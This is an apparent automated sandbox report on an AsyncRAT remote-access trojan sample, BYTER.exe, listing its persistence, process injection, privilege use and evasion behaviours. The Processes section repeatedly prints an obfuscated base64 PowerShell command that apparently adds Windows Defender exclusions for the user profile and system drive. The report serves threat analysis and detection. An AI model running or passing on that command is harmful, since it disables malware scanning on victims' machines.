Malware Analysis Report

2024-09-22 07:46

Sample ID 240603-h5597sfh6z
Target BYTER.exe
SHA256 ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724
Tags
asyncrat default execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724

Threat Level: Known bad

The file BYTER.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default execution rat

AsyncRat

Async RAT payload

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Unsigned PE

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-03 07:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 07:20

Reported

2024-06-03 07:23

Platform

win10v2004-20240508-en

Max time kernel

6s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4376 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4772 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4460 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 876 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\System32\cmd.exe
PID 2280 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\System32\cmd.exe
PID 2280 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 3612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2168 wrote to memory of 1028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2168 wrote to memory of 1028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2360 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2360 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

